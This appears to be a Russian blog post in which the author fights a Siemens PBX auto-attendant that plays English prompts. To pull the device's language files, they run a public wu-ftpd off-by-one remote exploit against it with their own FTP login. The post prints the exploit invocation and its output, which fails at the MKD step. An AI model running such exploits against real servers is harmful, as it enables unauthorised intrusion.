Приключения с Сименсом продолжаются.
siemens маразм АТС
Маразм крепчал...
До сих пор трахаюсь с этим долбаным автосекретарём сименсовским. Уже есть какой-то результат, снаружи можно дозвониться на внутренний номер, даже своё сообщение внедрил, всё работает. Но есть одно "но". Перед тем как зазвучит моё сообщение (по-русски), эта сволочь обязательно произносит свою мессагу, причём по-английски. В принципе, там есть выбор из примерно десяти языков, включая албанский (!), но вот русского среди них, увы, нету. И ни где нет галочки которая бы убирала нах эти стандартные сообщения.
Звоню в техподдержку, беседую с техником, тот мне говорит что галочка такая есть, но она доступна только в более свежей версии АТСки. Версии не платы автосекретаря IVMS8R, а именно АТС. Причём тут АТС, хотелось бы знать.
Короче, говорит, вам нужно обновить ПО АТС до v.5, "хотя я не уверен что там есть такая галочка"... Пппц..
Это уже совсем непорядок, живём вроде в России где все по-русски говорят, а автоответчик только по-буржуйски. Хотя есть прекрасная возможность залить туда любой язык - есть такая функция, закачивается тарбол в виде ivm_xxx.tar, где xxx аббревиатура названия языка. В тарболе по-идее набор wav'ок. Вопрос в том где этот файл взять. Пойдёт любой, хотя желательно английский, чтоб можно было сообщения понять и перевести на русский. Но на худой конец и любой другой сойдёт.
Короче, опять позвонил в техподдержку, побеседовал с инженером, тот сказал что был у них один спец который такое проделывал, но щас его нету.
Блин. Дайте мне файло я сам это проделаю.
В общем, он попросил меня "особо не мучать железку, а то ведь ей больно будет" :-D
И вот что обидно, там линух крутится, можно спокойно вытащить уже имеющиеся в ней языковые файлы. А хрен там, пока кроме как по ftp законнектиться не получилось, а в папке ftpшной ничего пододящего нету.
Эх, ладно, буду трахаться дальше.
На телнетовский 23-й порт не пускает. На 513-м порту (rlogin), к удивлению, telnet'ом коннектится, но показывает только эхо ввода, никакого своего вывода не даёт. Коннектюсь к этому порту rlogin'ом - нифига. Блин.
Оказалось что на шелезяке крутится
FTP server (Version wu-2.6.1(1) Thu Apr 1 16:32:58 CEST 2004) ready
Версия старая, нашёлся для неё эксплоит. Скачал исходник, скомпилил, запустил на БСДшной тачке.
# ./exp -h<айпи_железки> -u<фтп_логин> -p<фтп_пароль> -n<порт_фтп>
0x82-WOOoou~Happy_new - wu-ftpd v2.6.2 off-by-one remote exploit.
[*] Target: RedHat Linux 6.x Version wu-2.6.0(1) compile.
[+] address: 0x806a59c.
[*] #1 Try, 10.0.0.xxx:21 ... [ OK ]
[1] ftpd connection login.
[*] ftpd connection success.
[+] User id input.
[+] User password input.
[*] User xxx logged in.
[2] send exploit code.
[+] 01: make 0x41414141 directory.
[-] MKD command failed.
На этом дело стопорится. Прально, у этого юзверя нету прав на запись. Блин.
Будем копать дальше...
|
